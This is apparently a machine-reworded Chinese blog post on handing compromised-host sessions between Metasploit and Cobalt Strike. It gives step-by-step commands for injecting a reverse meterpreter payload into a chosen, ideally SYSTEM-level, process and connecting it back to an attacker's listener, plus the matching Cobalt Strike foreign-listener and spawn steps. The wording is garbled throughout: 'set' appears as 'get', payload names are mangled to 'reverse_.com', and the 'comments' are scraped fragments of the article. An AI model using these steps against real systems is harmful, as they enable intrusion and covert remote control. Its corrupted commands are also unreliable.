Msf与CS互传sessions会话
Msf派生1个shell发送给cs:
最先,msf得到1个meterpreter应用程序。
留意:meterpreter应用程序必须system管理权限,才可引入到别的系统进程。
用background把应用程序挂上去后台管理,采用别的exploit用以传送应用程序。
派生1个新的shell给cs,那么msf里边采用的exploit:
exploit/windows/local/payload_inject
实际操作:
use exploit/windows/local/payload_inject(采用exploit)
get payload windows/x64/meterpreter/reverse_.com(采用的payload必须要跟cs下监视的payload方法相同)
get DisablePayloadHandler true(严禁造成1个新的handler)
get LHOST iP(ip为cs监视应用程序用的ip)
get LPORT 端口号(端口号为cs相匹配的接纳反跳shell的端口号)
get pid 系统进程号(设定派生给cs后木马病毒系统进程的pid系统进程号,假如有system管理权限则可以特定1个具备system管理权限的系统进程,那样cs接受到应用程序都是最大权限)
get session 1(设定必须配送的meterpreter)
exploit(刚开始实行)
实行以后只能获得1个cs的应用程序。
cS下的应用程序发送给MSF:
最先在msf上监视自身的ip跟端口号:
use exploit/multi/handler
get payload windows/meterpreter/reverse_.com(跟cs上采用的payload相同)
get lhost 该机ip
get lport 接纳的端口号
exploit 实行
随后cs那里建立1个foreign监视的listeners。
Listeners的ip为msf的ip,端口号为msf监视的端口号(注:假如msf是内线下实体的,则必须把端口映射到内网ip,或是应用ngrok等专用工具做总流量发送)
随后,返回cs上,选定拿到的电子计算机应用程序,鼠标右键选定spawn,随后在弹出窗口的框中
挑选不久建立的listeners监听器,随后实行。
这时,msf下只能见到早已取得了1个新的应用程序。
留意:早期运用的payload荷载必须要跟总体目标系统软件的系统软件十位数相同,不然后边传送应用程序的那时候会出現难题。
相关文章
- 3条评论
- 温人贪欢2022-05-28 06:38:40
- reverse_.com(采用的payload必须要跟cs下监视的payload方法相同)get DisablePayloadHandler true(严禁造成1个新的handler)get LHOST iP(ip为cs监视应用程序用的ip)get LPORT 端口号(端口号为cs相匹配的接
- 闹旅矫纵2022-05-28 02:15:03
- ll给cs,那么msf里边采用的exploit:exploit/windows/local/payload_inject实际操作:use exploit/windows/local/payload_inject(采用exploit)get payload windows/x64/
- 颜于栖迟2022-05-27 22:50:36
- 久建立的listeners监听器,随后实行。这时,msf下只能见到早已取得了1个新的应用程序。留意:早期运用的payload荷载必须要跟总体目标系统软件的系统软件十位数相同,不然后边传送应用程序的那时候会出現难题。